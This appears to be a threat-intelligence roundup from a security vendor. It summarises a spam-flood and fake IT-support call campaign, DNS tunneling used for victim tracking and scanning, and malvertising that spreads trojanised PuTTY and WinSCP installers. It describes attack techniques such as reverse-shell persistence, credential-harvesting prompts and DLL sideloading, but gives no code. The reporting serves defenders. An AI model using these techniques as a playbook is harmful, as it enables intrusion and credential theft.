CTI Roundup: Social Engineering, DNS Tunneling, & Malvertising

This week, CTI highlights a social engineering campaign that attempts to overwhelm users with spam email before posing as the company’s IT team. Next, CTI looks at Palo Alto’s latest case study which details DNS tunneling applications they have observed in the wild. Finally, CTI investigates an ongoing campaign that is distributing weaponized installers for WinSCP and PuTTY via malicious advertisements.

1. Ongoing social engineering campaign targets enterprises

An ongoing social engineering campaign attempts to overwhelm users with numerous spam emails before posing as the company’s IT team and calling the user to offer assistance.

In this campaign, a phone call prompts the user to download remote monitoring and management software or use Microsoft’s built-in Quick Assist feature to establish a remote connection to the device. The threat actor then downloads malicious payloads, harvests credentials, and establishes persistence.

Although the attacks do not involve ransomware, IOCs from the attacks have been previously linked to the Black Basta ransomware operation.

Rapid7 has observed several cases of this social engineering campaign since late April 2024. The attacks all begin with a group of users within the targeted environment that receives a large quantity of spam emails.

Rapid7 has confirmed that the volume of spam would be enough to “overwhelm the email protection solutions in place and arrived in the user’s inbox.”

The emails

The emails themselves are not inherently malicious. They are instead newsletter sign-up confirmation emails from many legitimate organizations. Because the user receives so many of these spam emails they will likely begin to be concerned, or at least question the activity.

The phone calls

After sending a large quantity of emails to the users, the threat actor will reach out to each user via a phone call, pretending to be someone from their IT team.

The actor will offer the user support for the email “issues” they are experiencing and will attempt to get the user to provide remote access to their device via remote monitoring and management (RMM) tools, like AnyDesk.

In other scenarios the actor abused the built-in Windows remote support utility Quick Assist. If a user did not fall for the social engineering attempt the actor would simply move on to the next targeted user.

Access obtained

If the user falls for the attempt and the actor gains remote access to the device, they will start by executing a series of batch scripts. These scripts appear to the user as updates to look less suspicious.

The first script will verify connectivity to the C2 server and download a zip archive. This archive includes a legitimate copy of OpenSSH that is renamed to RuntimeBroker.exe along with its dependencies, RSA keys, and other SSH files.

The script will establish persistence with run key entries that will point to additional batch scripts that are created at run time. Each of these scripts will execute SSH via PowerShell in an infinite loop and attempt to establish a reverse shell to the C2.

In all cases observed by Rapid7, the script harvested the credentials of the victim from the command line via PowerShell. The credentials are gathered when a prompt posing as an “update” asks the user to enter their credentials to log in for the update to proceed. In one case, after initial compromise, the actor moved laterally in the environment via SMB.

Rapid7 did not observe the actor deploying ransomware in any of these attacks. However, the IOCs identified via forensic analysis align with that of the Black Basta ransomware operation.

Analyst comments from Tanium’s Cyber Threat Intelligence team

Researchers are increasingly observing advanced social engineering techniques like this campaign. This is mainly because they are effective.

In this attack, the threat actor sets up the user to believe they need support before posing as the IT team and reaching out to the victim, essentially creating their own problem to be “solved.”

This technique is a little different to the MGM attack but achieves the same goal and highlights the degree of sophistication social engineering is taking on lately. These types of attacks will likely occur more often as threat actors continue to adopt generative AI and LLMs for things like deepfakes.

2. Hackers expand DNS tunneling

Palo Alto’s Unit 42 recently released a case study covering applications of DNS tunneling they have observed in the wild.

These threat actors are using DNS tunneling to track when their target opens phishing emails and clicks on malicious links and also use them to scan for potential vulnerabilities.

These techniques expand beyond traditional DNS tunneling uses cases of C2 and VPN purposes.

What is DNS tunneling?

DNS tunneling is a popular strategy that threat actors to exfiltrate information. Threat actors often use DNS tunneling to establish communication with their C2, which enables them to exfiltrate and infiltrate data. Actors also commonly use DNS tunneling for VPN purposes. Regardless of the purpose, actors typically encode data with their own methods that combine the traffic with legitimate DNS traffic.

Palo Alto’s research reveals that actors are now also using DNS tunnels for tracking and scanning.

DNS tunneling for tracking

Threat actors are now using DNS tunneling to track the activities of their targeted victims to see when they click on malicious links or advertisements.

To do this, an actor would embed malware information about the victim’s actions into a unique subdomain of a DNS query. This subdomain would be the tunneling payload and all DNS queries are stored on an attacker-controlled nameserver.

• TrkCdn campaign: This campaign is meant to track a victim’s interaction with an email.

Palo Alto identified 731 potential victims of this campaign and 75 IP addresses for nameservers resolving 658 domains. To track, actors can query their DNS logs and compare the payload with the hash value of the email address to confirm if a particular victim has opened an email or clicked a link within an email.

• SpamTracker campaign: Another real-world example of this is a campaign called SpamTracker, which uses DNS tunneling to track the delivery of spam messages.

This campaign has been tied to 44 tunneling domains all sharing the same IP for its nameservers. The domains share similar DGA naming method and encoding as other campaigns. SpamTracker is believed to originate from Japan and uses emails and website links to deliver spam and phishing with lures like fortune-telling services, fake package delivery updates, secondary job offers, and lifetime free items.

DNS tunneling for scanning

Threat actors also use DNS tunneling to scan a network, often with spoofed source IP addresses, to discover open resolvers that they can exploit. This activity is often the first stage of an attack.

• SecShow campaign: Palo Alto identified a campaign where the actor used DNS tunneling to scan network infrastructure of an organization, which was typically followed by reflection attacks.

The actor looked for open resolvers, tested resolver delays, and exploited any identified resolver vulnerabilities. This campaign primarily targeted the education, technology, and government sectors.

Analyst comments from Tanium’s Cyber Threat Intelligence team

Threat actors most commonly leverage DNS tunneling for C2 and VPN reasons.

Palo Alto’s case study reveals that threat actors are now expanding this technique for things like network scanning and tracking.

The tracking aspect is interesting and indicates that some threat actors are actually taking the time to see how far their campaign is reaching and how successful it is, rather than simply blasting out campaigns and hoping for the best.

3. Malvertising campaign leads to ransomware

An ongoing campaign is distributing weaponized installers for WinSCP and PuTTY via malicious advertisements.

The malware enables the threat actor to obtain an elevated foothold and blend in with legitimate administrative actions. In at least one case, the malvertising attack resulted in the attempt to distribute ransomware.

Malvertising campaign overview

This campaign started in early March 2024 when Rapid7 identified threat actors distributing weaponized WinSCP and PuTTy installers. Victims are led to these malicious installers after searching for WinSCP or PuTTy downloads via a search engine and clicking on a malicious ad. The malicious ad will direct the user to a site that looks very similar to the legitimate download site.

These spoofed sites contain a link to download a zip archive that contains a trojan from a secondary domain that was embedded on the page. When the user downloads and extracts this content, the infection begins. As part of the attack, a malicious DLL is sideloaded.

Rapid7 notes that some of the TTPs in this attack “are reminiscent of past BlackCat/ALPHV campaigns.” In one case, Rapid7 saw the actor attempting to exfiltrate data via Restic and attempting to deploy ransomware. This attempt was blocked during execution.

Initial access

The infection begins when the user clicks on the malicious advertisement and downloads a fake WinSCP or PuTTy installer. The typosquatted PuTTy page included an extra “t” in the domain, making It difficult for the user to spot the difference.

The landing page of this typosquatted page is a download link along with two legitimate links to other resources. When the victim downloads the installer, it will call an embedded function and ultimately redirect the user to the most recent malicious zip archive to download.

Execution

Once the zip archive is extracted, the user is presented with setup.exe, which is a renamed copy of python.exe. When executed, setup.exe will sideload a malicious DLL, python311.dll, which will load a renamed copy of the legitimate DLL, python3.dll.

After successful sideloading occurs the malware will perform a pre-unpacking setup and dynamically resolve additional functions. It uses functionality similar to the publicly available AntiHook library for setup and execution.

The malware will resolve NTAPI (Windows Native API) functions to “bypass detection applied to more commonly used user mode functions (WINAPI) and access lower-level functionality that is otherwise unavailable.” After setup is complete the malware retrieves an encrypted resource from the DLL. The malware decrypts this resource in memory, resulting in a zip archive that contains three compressed files, including a legit MSI installer for PuTTY. The malware ultimately decrypts a file that is a Sliver beacon DLL.

Analyst comments from Tanium’s Cyber Threat Intelligence team

We already know that malvertising is popular, but this is one of the few instances in which a threat actor used it to attempt to deploy ransomware.

While the ransomware deployment was unsuccessful, there is the potential that this actor (or others) will try this method again. The combination of malvertising and ransomware is certainly concerning and differs from most ransomware deployments.

With ransomware, threat actors often target specific victims and have some degree of technical sophistication to obtain initial access. The inclusion of malvertising for initial access lets the victims come to the actor instead.

---

Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum and start a conversation.

For further reading, catch up on our recent cyber threat intelligence roundups.